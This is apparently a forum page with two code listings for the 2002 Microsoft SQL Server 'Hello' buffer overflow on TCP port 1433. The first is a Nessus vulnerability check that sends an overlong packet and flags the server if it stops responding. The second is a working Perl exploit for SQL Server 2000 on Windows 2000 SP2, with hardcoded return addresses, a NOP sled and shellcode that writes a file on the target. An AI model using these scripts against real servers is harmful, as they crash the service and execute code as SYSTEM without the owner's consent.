Code: |
##
# # this script tests for the "You had me at hello" overflow # in MSSQL (tcp/1433) # Copyright Dave Aitel (2002) # Bug found by: Dave Aitel (2002) # ## #TODO: #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! if(description) { script_id(11067); # script_cve_id("CVE-2000-0402"); script_version ("$Revision: 0.1 $"); name["english"] = "Microsoft SQL Server Hello Overflow"; script_name(english:name["english"]); desc["english"] = " The remote MS SQL server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Microsoft SQL Server Hello Overflow"; script_summary(english:summary["english"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel"); family["english"] = "Windows"; script_family(english:family["english"]); script_require_ports(1433); exit(0); } # # The script code starts here # #taken from mssql.spk pkt_hdr = raw_string( 0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b ,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02 ,0x10 ,0x00 ,0x00 ,0x00 ); #taken from mssql.spk pkt_tail = raw_string ( 0x00 ,0x24 ,0x01 ,0x00 ,0x00 ); #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! port = 1433; found = 0; report = "The SQL Server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; if(get_port_state(port)) { soc = open_sock_tcp(port); if(soc) { #uncomment this to see what normally happens #attack_string="MSSQLServer"; #uncomment next line to actually test for overflow attack_string=crap(560); # this creates a variable called sql_packet sql_packet = pkt_hdr+attack_string+pkt_tail; send(socket:soc, data:sql_packet); r = recv(socket:soc, length:4096); close(soc); #display ("Result:",r,"\n"); if(!r) { # display("Security Hole in MSSQL\n"); security_hole(port:port, data:report); } } } |
Code: |
#!/usr/local/bin/perl
#----------------------------------------------------------- # Exploit will create file '\scan_sql2k_bo2.' # # SQL Server 2000 'Hello Bug' for Win2k(SP2) # by sk@scan-associates.net & spoonfork # # Bug found by # Dave Aitel # http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0 # # http://www.scan-associates.net/ # greetz to: scan clan, especially to tynon, pokleyzz, and wyse # Alphaque and L33tdawg. # and Dave Aitel for finding and not releasing the exploit :> # original and most up-to-date of dis file can be found in # http://www.scan-associates.net/papers/sql2kx2.txt #----------------------------------------------------------- use Socket; $connect_host = $ARGV[0]; if (!defined($connect_host)) { print "Usage: $0 <target>\n"; exit 255; } $port = 1433; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); $bug = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; $bug .= "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; $bug .= "\x10\x00\x00\x00"; $bug2 = "A" x 528; $bug .= $bug2; $bug .= "\x6b\xd0\xc0\x40"; $bug .= "AAAA"; $bug .= "\x83\x91\xe8\x77"; $bug .= "\x50\x1e\xd0\x42"; $bug .= "\x0b\x03\x0f\x02"; $bug .= "DDDD"; $bug .= "\x50\x1e\xd0\x42"; $bug .= "\x50\x1e\xd0\x42"; $bug3 = "\x90" x 88; $bug .= $bug3; $bug .= "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73"; $bug .= "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88"; $bug .= "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2"; $bug .= "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0"; $bug .= "\x00\x24\x01\x00\x00"; print SOCKET $bug; |
output generated using printer-friendly topic mod, All times are GMT + 2 Hours